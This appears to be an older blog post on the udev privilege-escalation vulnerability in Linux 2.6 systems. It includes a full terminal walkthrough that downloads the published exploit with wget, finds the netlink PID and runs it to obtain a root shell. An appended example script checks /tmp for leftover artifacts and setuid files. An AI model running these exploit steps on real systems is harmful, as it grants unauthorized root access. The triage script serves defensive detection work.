Udev Exploit Allows Local Privilege Escalation

A nasty new udev vulnerability is floating around in the wild that allows local users on Linux systems with udev and 2.6 kernels (2.6 is required for udev) to gain root privileges. Exploit code has been published and is quite easy to use. Secunia has an advisory at http://www.securityfocus.com/bid/34536 and a further discussion can be found at http://blog.cr0.org/2009/04/interesting-vulnerability-in-udevd.html.

The problem with this vulnerability is that any local user can use it to elevate to root. This means that if you have any malicious users, or any compromised accounts on your system, you could be at risk.

Downloading the exploit code is quite simple; you can grab it from http://seclists.org/fulldisclosure/2009/Apr/att-0198/udev_txt. Once you've downloaded the code, put it in its own directory to prevent confusion. Running it requires some experimentation, as you have to provide the proper PID to the script in order for the code to work. An example follows:

[asmith@teen-spirit ~]$ mkdir udev
[asmith@teen-spirit ~]$ cd udev
[asmith@teen-spirit udev]$ wget http://seclists.org/fulldisclosure/2009/Apr/att-0198/udev_txt
--15:58:25--  http://seclists.org/fulldisclosure/2009/Apr/att-0198/udev_txt
           => `udev_txt'
Resolving seclists.org... 64.13.134.50
Connecting to seclists.org|64.13.134.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,470 (3.4K) [text/plain]

100%[====================================>] 3,470         --.--K/s

15:58:26 (41.33 KB/s) - `udev_txt' saved [3470/3470]

[asmith@teen-spirit udev]$ ls
udev_txt
[asmith@teen-spirit udev]$ perl -i -pe 'chomp; print "\n";' udev_txt
[asmith@teen-spirit udev]$ chmod +x udev_txt
[asmith@teen-spirit udev]$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
cfed0e00 0   0      00000000 0        0        00000000 2
c89d1a00 0   2617   00000111 0        0        00000000 2
cf87e200 6   0      00000000 0        0        00000000 2
cfafb000 7   2157   00000001 0        0        00000000 2
c135cc00 7   0      00000000 0        0        00000000 2
c13d3600 9   0      00000000 0        0        00000000 2
cf893000 10  0      00000000 0        0        00000000 2
cfed0c00 15  0      00000000 0        0        00000000 2
cfad5e00 15  553    ffffffff 0        0        00000000 2
c136d400 16  0      00000000 0        0        00000000 2

[asmith@teen-spirit udev]$ ./udev_txt 553
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# whoami
root
sh-3.1# ls
libno_ex.so.1.0  program.c  program.o  suid.c  udev.c  udev_txt
sh-3.1# ls /tmp
libno_ex.so.1.0  udev?                suid            udev 

And you're root - it's just that simple (and scary).
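
For triage on a host where this may have been run, the files left behind in the `ls /tmp` listing above give something concrete to look for. The shell function below is an added example, not part of the original post or of the exploit; the artifact names are copied from that listing, and the setuid check is a general one added here on the assumption that setuid files do not belong in a scratch directory.

```shell
#!/bin/sh
# Added example: triage a directory for leftovers like those in the session above.
# Names are copied from the `ls /tmp` output in the post; they are trivial to
# rename, so the setuid check below is the more durable signal.
ARTIFACT_NAMES="libno_ex.so.1.0 suid udev"

# describe KIND PATH: print "<KIND> <mode> <owner> <path>" using portable ls.
describe() {
    printf '%s %s %s\n' "$1" "$(ls -ld -- "$2" | awk '{print $1, $3}')" "$2"
}

# scan_dir DIR: report findings on stdout.
# Returns 0 if clean, 1 if anything was found, 2 if DIR is not a directory.
scan_dir() {
    dir=$1
    found=0
    [ -d "$dir" ] || { echo "scan_dir: not a directory: $dir" >&2; return 2; }

    # 1. Files whose names match the artifacts listed in the post.
    for name in $ARTIFACT_NAMES; do
        if [ -e "$dir/$name" ]; then
            describe NAME "$dir/$name"
            found=1
        fi
    done

    # 2. Any regular file with the setuid bit set, whatever it is called.
    #    (Assumption of this example: such files do not belong in a
    #    world-writable scratch directory and deserve a look.)
    setuid_files=$(find "$dir" -maxdepth 1 -type f -perm -4000 2>/dev/null)
    if [ -n "$setuid_files" ]; then
        found=1
        printf '%s\n' "$setuid_files" | while IFS= read -r path; do
            describe SETUID "$path"
        done
    fi
    return "$found"
}

# Usage after sourcing this file:  scan_dir /tmp
```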